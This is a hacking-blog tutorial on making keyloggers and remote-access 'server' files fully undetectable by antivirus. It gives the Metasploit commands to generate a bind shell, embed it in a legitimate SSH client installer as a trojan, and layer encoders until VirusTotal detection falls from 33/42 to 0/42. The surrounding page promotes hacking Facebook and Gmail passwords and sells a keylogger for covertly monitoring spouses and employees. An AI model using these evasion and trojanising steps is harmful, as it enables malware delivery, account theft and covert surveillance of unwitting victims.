Latest: Hack Facebook Password! | Wants To Hack CellPhone | Trace Mobile Number(only US) ! | New : Best FUD Keylogger!

Featured Posts

hack mobile

Sunday, June 9, 2013

Make Keylogger 100% FUD | How To Bypass Antivirus Detection

Posted by wildrank on Sunday, June 09, 2013

On WildHacker, I have written so many tutorials on Keylogger, iStealer, Rats hacking tool. But the main problem is antivirus detection, most of the hacking tools are dectable. So to bypass antivirus detection we have to make that server file ( which is created using Keylogger, iStealer, Rats ) fully undectable. Few months back I had already explained you Hexing tutorial to make such virus file or server file fully undectable. Today in this tutorial i am going to explain one more way to make virus file undectable using BackTrack. Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We'll use metasploit to render malware completely invisible to antivirus. So follow the step by step instruction to make a virus Fully Undetectable from all the antiviruses.
What You Need ??
A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.
Creating a Listener
This is a simple payload that gives the attacker remote control of a machine. It is not a virus, and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:

command :

msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

ls -l listen.exe

You should see the listen.exe file, as shown below:

make undectable keylogger
Analyzing the Listener with VirusTotal
In BackTrack, click Applications, Internet, "Firefox Web Browser".\

In Firefox, go to https://www.virustotal.com/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe

"listen.exe" appears in the "Choose File" box, as shown below:

make undectable keylogger


In the VirusTotal web page, click the "Scan It!" button.

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

make undectable keylogger

Saving the Screen Image
Make sure the result is visible, showing something like "Detection rate: 33/42", as shown above. Save a screen capture with a filename of "Proj 6xa from YOUR NAME".
Encoding the Listener
This process will encode the listener, and insert it into an innocent SSH file.

In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe

msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1

ls -l evil*

You should see the evil-ssh.exe file, as shown below:

make undectable keylogger

Analyzing the Encoded Listener with VirusTotal
In Firefox, go to https://www.virustotal.com/

Click the "Choose File" button. Navigate to /root and double-click the evil-ssh.exe file.

In the VirusTotal web page, click the "Scan It!" button.

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

make undectable keylogger

Encoding the Listener Again
This process will encode the listener with several different encodings, as recommended by Keith Burton (Thanks!). In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1

msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1

msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1

ls -l listen*

You should see several files, as shown below:

make undectable keylogger
Analyzing the Encoded Listener with VirusTotal
In Firefox, go to https://www.virustotal.com/

Click the "Choose File" button. Navigate to /root and double-click the listen5.exe file.

In the VirusTotal web page, click the "Scan It!" button.

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that fewer of the antivirus engines detect the file now--0 out of 42, when I did it, as shown below. You may see different numbers.

make undectable keylogger


thats it friends..

I hope now you can easily make your keylog file(server) fully undectable using this technique. If you have any problem in making your keylog(server) file 100% fully undectable(FUD) to bypass antivirus detection, mention it in comments section.

HappY HaCkInG..


If you enjoyed this post and wish to be informed whenever a new post is published, then make sure you subscribe to my regular Email Updates. Subscribe Now!



Do you need to know what your child is doing on the computer? Do you want to know what your loved ones or spouse or kids are doing on the computer? Do you need to monitor what your employees are doing during work hours? Are they working or playing?

Winspy Keylogger is intended to help you in these kind of situations. It can show you exactly what is being done on the computer at any time.

Click Here To Download Winspy Keylogger
 
  • Gmail Hacking

    Wants to hack Gmail a/c password ? Learn best way to hack Gmail password..

  • Jailbreak Iphone/iPad

    Jailbreak your Iphone or iPad to give it more functionality free of cost...

  • Facebook Hacking

    Wants to hack Facebook password? But Don't Know Where to Start? Learn here......

  • MAC Keylogger

    Learn how to hack emails account password on MAC OS using keylogger....

  • Mobile Hacking

    Monitor mobiles,Records the activities of anyone who uses iPhone, BlackBerry....

Disclaimer

ALL INFORMATION / TUTORIALS WRITTEN ON WILDHACKER.COM ARE FOR EDUCATIONAL PURPOSES ONLY, THE SITE WILDHACKER.COM IS NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM ALL THIS INFRORMATION.

Recipes

Unlock Iphone Website Hacking

Facebook Hacking Keylogger

Unlock Blackberry Unlock Modem

Gmail Hacking Hack Yahoo

Hotmail Hacking Remote Hacking

Blog Archive

Traffic / Ranking

Powered by:

Wild Hacker © 2012. All Rights Reserved | Contact | Bloggers.com